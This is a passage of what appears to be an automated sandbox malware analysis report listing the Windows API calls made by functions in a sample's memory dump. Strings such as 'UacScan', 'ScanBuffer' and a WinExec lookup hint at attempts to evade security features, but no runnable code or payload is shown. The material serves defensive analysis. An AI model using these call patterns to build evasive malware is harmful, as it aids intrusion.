                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                                                              • String ID: Kernel32$WinExec
                                                                                                                              • API String ID: 2292790416-3609268280
                                                                                                                              • Opcode ID: f2e4eab999c3dbba6705771c0c34a1298baa87a820816fc6fc720bac6e52c443
                                                                                                                              • Instruction ID: aa15607668edd3928571eb1e52a6619f9466bc7e05532dbea38096e55801e32c
                                                                                                                              • Opcode Fuzzy Hash: f2e4eab999c3dbba6705771c0c34a1298baa87a820816fc6fc720bac6e52c443
                                                                                                                              • Instruction Fuzzy Hash: 75F0A439654304BFEB02EFA8DC41F5A77EDE748710F5184A0B508D7E50D634A904DE22
                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C08
                                                                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C36
                                                                                                                                • Part of subcall function 02B27D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B33880,02B35C76,00000000,02B35CF4,?,?,02B33880), ref: 02B27D5E
                                                                                                                                • Part of subcall function 02B27F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B33880,02B35C91,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B27F37
                                                                                                                              • GetLastError.KERNEL32(00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C9B
                                                                                                                                • Part of subcall function 02B2A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B2C359,00000000,02B2C3B3), ref: 02B2A717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 503785936-0
                                                                                                                              • Opcode ID: 0d4d53a1d4632ce329ab578801f9b964810193524102552871df7e031314d89d
                                                                                                                              • Instruction ID: 679de02c7d1e6923f602fde8100a4eae514b70061ba55b019b93c06bb71eb56c
                                                                                                                              • Opcode Fuzzy Hash: 0d4d53a1d4632ce329ab578801f9b964810193524102552871df7e031314d89d
                                                                                                                              • Instruction Fuzzy Hash: AD317270A003149FDB11EFA8C88179EB7F6AF48314F9084A5E518AB380DB755A498FA5
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02C75914), ref: 02B3E6FC
                                                                                                                              • RegSetValueExA.ADVAPI32(00000900,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E734
                                                                                                                              • RegCloseKey.ADVAPI32(00000900,00000900,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E73F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 779948276-0
                                                                                                                              • Opcode ID: 3bda509cbd0030ad49cae28b5463df5f57e964b99a90ced8bc5b970ff279b1eb
                                                                                                                              • Instruction ID: f606575ae45da6468a978fbeed0b42716142a2fb6fe5f03ac61dbf3ab40ceb67
                                                                                                                              • Opcode Fuzzy Hash: 3bda509cbd0030ad49cae28b5463df5f57e964b99a90ced8bc5b970ff279b1eb
                                                                                                                              • Instruction Fuzzy Hash: FD110371A10314AFE701EBA4DC819AD7BBDEB49750F5005A1FA08D7650D734DE45CE61
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02C75914), ref: 02B3E6FC
                                                                                                                              • RegSetValueExA.ADVAPI32(00000900,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E734
                                                                                                                              • RegCloseKey.ADVAPI32(00000900,00000900,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E73F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 779948276-0
                                                                                                                              • Opcode ID: e4d33faea1f7bf83cdc0f58fcaed900246599f581c551c8a6db067d1e01106dc
                                                                                                                              • Instruction ID: c8121d2c3b9e1f3927617ade14a9987146b90d8259490800ccdc2d05c24774b8
                                                                                                                              • Opcode Fuzzy Hash: e4d33faea1f7bf83cdc0f58fcaed900246599f581c551c8a6db067d1e01106dc
                                                                                                                              • Instruction Fuzzy Hash: 58110371A10314AFE701EBA4D88199D7BBDEB49750F5005A1F608D7650D734DA45CE61
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClearVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1473721057-0
                                                                                                                              • Opcode ID: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
                                                                                                                              • Instruction ID: ac36e5fc09ac2e5a5db20bfa2257a53e0431beb31e33cb5368e76ff476ffc371
                                                                                                                              • Opcode Fuzzy Hash: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
                                                                                                                              • Instruction Fuzzy Hash: 02F0C861718330C79B227B3B9E845AD27969F0874275494E5A44E9B205CB24EC0DCB62
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 02B24D07
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02B24D19
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$Free$Alloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 986138563-0
                                                                                                                              • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                                              • Instruction ID: 6c3f78a8d2133a0a27c54277c824a072fa3944722b1e73d9c2f04514de68636a
                                                                                                                              • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                                              • Instruction Fuzzy Hash: 7FE012B81153216EEF182F299C40B37373AEFC1751B5454D9B84CCA555D734C449AD34
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02B3735A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString
                                                                                                                              • String ID: H
                                                                                                                              • API String ID: 3341692771-2852464175
                                                                                                                              • Opcode ID: 5baef3381a6c8807b203f98fbb0906fcec12689b736a6d94da10fc836989e3e9
                                                                                                                              • Instruction ID: bdf4cf3cc3a075be054efa66091c9afff1584f06097c7ae130a589e2b765ba8f
                                                                                                                              • Opcode Fuzzy Hash: 5baef3381a6c8807b203f98fbb0906fcec12689b736a6d94da10fc836989e3e9
                                                                                                                              • Instruction Fuzzy Hash: 7AB1D3B5A01608EFDB15CF99D980A9DFBF2FF4A314F1481A9E845AB360DB30A845DF50
                                                                                                                              APIs
                                                                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B2E701
                                                                                                                                • Part of subcall function 02B2E2E4: VariantClear.OLEAUT32(?), ref: 02B2E2F3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearCopy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 274517740-0
                                                                                                                              • Opcode ID: 811235bc3c524b9a37ccc01ed7704c2e3d01b5f70b1f2672f8d4b1283c1adafe
                                                                                                                              • Instruction ID: 3859d639ccd92b464da088c1717b4148f827e8fe83a52248a4dc4fbe64e6451b
                                                                                                                              • Opcode Fuzzy Hash: 811235bc3c524b9a37ccc01ed7704c2e3d01b5f70b1f2672f8d4b1283c1adafe
                                                                                                                              • Instruction Fuzzy Hash: C311703070033097CB21EF6AC8C4A6A77AAEF5965071454E6E64E8B265DB30EC0DCAA1
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B21A03,?,02B22000), ref: 02B215E2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: 0`
                                                                                                                              • API String ID: 4275171209-3339448193
                                                                                                                              • Opcode ID: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
                                                                                                                              • Instruction ID: 6bc3129b6980054ab98f3620fc1b0261f8c5fa94a0e7c892ea6541d6774eab5c
                                                                                                                              • Opcode Fuzzy Hash: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
                                                                                                                              • Instruction Fuzzy Hash: 97F0F9F0B513004FEB05DF7999443057AE6EB89389F1485B9E709DB399E771D4198B10
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1927566239-0
                                                                                                                              • Opcode ID: e1f4a774934ccf64ce3de86985de64d42dc11786b76b159386404469ce24c6d4
                                                                                                                              • Instruction ID: 37fb33052693bec0e8c91ee4d4b4f99e2090fef439e3d9e32e61c4891298f951
                                                                                                                              • Opcode Fuzzy Hash: e1f4a774934ccf64ce3de86985de64d42dc11786b76b159386404469ce24c6d4
                                                                                                                              • Instruction Fuzzy Hash: CE316F71600328ABDB11DEAAC984AAE77B8EB0C301F4845E1F91DD7250D334F958CB61
                                                                                                                              APIs
                                                                                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D39,?,?,?,00000000), ref: 02B36D19
                                                                                                                                • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeFromProgString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4225568880-0
                                                                                                                              • Opcode ID: fdd3de3de25d8828470be5c9e07a3aaaed2ec7511f337b682fc536585ba7547a
                                                                                                                              • Instruction ID: 6ca04686244a69351007b29f1fdcdee3a242afc09b583c784f1a87b73c4fa994
                                                                                                                              • Opcode Fuzzy Hash: fdd3de3de25d8828470be5c9e07a3aaaed2ec7511f337b682fc536585ba7547a
                                                                                                                              • Instruction Fuzzy Hash: 8BE0E530200354BFE312EBA5CC0195A77BDDB49B40B5108F1B804D7510DA305D088864
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B25832
                                                                                                                                • Part of subcall function 02B25A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
                                                                                                                                • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
                                                                                                                                • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
                                                                                                                                • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
                                                                                                                                • Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
                                                                                                                                • Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
                                                                                                                                • Part of subcall function 02B25A78: RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2796650324-0
                                                                                                                              • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                              • Instruction ID: ec2e068fef510ae88d5aa20802f0e3d832a6390947f2cf17fbe46fbc01d70543
                                                                                                                              • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                              • Instruction Fuzzy Hash: 20E06D71A003248BCB24DE5C88C0A5637D8AB08750F4005A5EC58DF34AD3B0E9588BD0
                                                                                                                              APIs
                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B27DA8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3934441357-0
                                                                                                                              • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                              • Instruction ID: 5be0ff0480d8eec0c22653ce75bdf1a026931da633dce5af00bb0e8753da3c6e
                                                                                                                              • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                              • Instruction Fuzzy Hash: 32D05BB23082507AD220955A5C44EFB6BDCCFC9770F100679B65CC3180D7208C0587B1
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                                                                              • Instruction ID: d7678910550ce20209b4aa3b702b079867ba496f6357d968b5c572fa92964d48
                                                                                                                              • Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                                                                              • Instruction Fuzzy Hash: 84C08CB02123280E1E50B2FC0CC450E428C8B052383B02FE1E63CD61D2DB25D85E3430
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                                                                              • Instruction ID: 080508bb58a6f946d11d0a9c625fc55499b04c5fa561b98b89af562099ce8e2e
                                                                                                                              • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                                                                              • Instruction Fuzzy Hash: 6FC08CE02023220A1A50B1FC0CC402A428C8B091383A42FE2E63CEA2E2DB25882F3430
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3341692771-0
                                                                                                                              • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                                                                              • Instruction ID: 7828a7fa3cc2a63a7fb7fddbea92434594ee396cb8bfdb4702b14bb4848097a4
                                                                                                                              • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                                                                              • Instruction Fuzzy Hash: 03C012A261033447FB219A9C9CC075562DCDB09295B1410E1E40CD7241E3609C044665
                                                                                                                              APIs
                                                                                                                              • timeSetEvent.WINMM(00002710,00000000,02B4BB3C,00000000,00000001), ref: 02B4BB58
                                                                                                                              Memory Dump Source
